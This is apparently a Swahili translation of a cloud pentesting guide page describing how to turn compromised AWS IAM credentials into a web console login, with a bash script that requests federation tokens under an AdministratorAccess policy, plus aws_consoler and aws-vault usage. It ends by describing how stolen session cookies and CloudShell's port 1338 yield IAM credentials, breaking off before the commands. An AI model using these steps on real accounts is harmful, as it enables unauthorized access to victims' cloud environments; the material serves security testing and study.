Ikiwa umeweza kupata baadhi ya akreditif za IAM huenda ukavutiwa na kuingia kwenye console ya wavuti ukitumia zana zifuatazo.
Kumbuka kwamba mtumiaji/role lazima awe na ruhusa sts:GetFederationToken.
Skripti ya Kawaida
Skripti ifuatayo itatumia profaili ya kawaida na eneo la AWS la kawaida (sio gov na sio cn) kukupa URL iliyosainiwa ambayo unaweza kutumia kuingia ndani ya console ya wavuti:
# Get federated creds (you must indicate a policy or they won't have any perms)## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges## Don't forget to use [--profile <prof_name>] in the first line if you need tooutput=$(awsstsget-federation-token--nameconsoler--policy-arnsarn=arn:aws:iam::aws:policy/AdministratorAccess)if [ $? -ne0 ]; thenecho"The command 'aws sts get-federation-token --name consoler' failed with exit status $status"exit $statusfi# Parse the outputsession_id=$(echo $output |jq-r'.Credentials.AccessKeyId')session_key=$(echo $output |jq-r'.Credentials.SecretAccessKey')session_token=$(echo $output |jq-r'.Credentials.SessionToken')# Construct the JSON credentials stringjson_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
# Define the AWS federation endpointfederation_endpoint="https://signin.aws.amazon.com/federation"# Make the HTTP request to get the sign-in tokenresp=$(curl-s"$federation_endpoint" \--get \--data-urlencode "Action=getSigninToken" \--data-urlencode "SessionDuration=43200" \--data-urlencode "Session=$json_creds")signin_token=$(echo-n $resp |jq-r'.SigninToken'|tr-d'\n'|jq-sRr@uri)# Give the URL to loginecho -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
cd/tmppython3-mvenvenvsource./env/bin/activatepipinstallaws-consoleraws_consoler [params...] #This will generate a link to login into the console
Hakikisha mtumiaji wa IAM ana ruhusa ya sts:GetFederationToken, au toa jukumu la kuchukua.
aws-vault
aws-vault ni chombo cha kuhifadhi na kufikia kwa usalama akidi za AWS katika mazingira ya maendeleo.
aws-vaultlistaws-vaultexecjonsmith--awss3ls# Execute aws cli with jonsmith credsaws-vaultloginjonsmith# Open a browser logged as jonsmith
Unaweza pia kutumia aws-vault kupata session ya console ya kivinjari
Kutoka Console hadi IAM Creds
Iligunduliwa awali katika chapisho hili, Ikiwa utafanikiwa kuingilia baadhi ya ufikiaji wa console ya wavuti (labda ulipora vidakuzi na huwezi kufikia folda ya .aws), unaweza kupata baadhi ya akreditivu za token za IAM kwa ajili ya mtumiaji huyo kupitia CloudShell.
CloudShell inatoa akreditivu za IAM kupitia kiunganishi kisichoorodheshwa kwenye bandari 1338. Baada ya kupakia vidakuzi vya session kutoka kwa mwathirika kwenye kivinjari chako, unaweza kuhamasisha CloudShell na kutoa amri zifuatazo ili kupata akreditivu za IAM.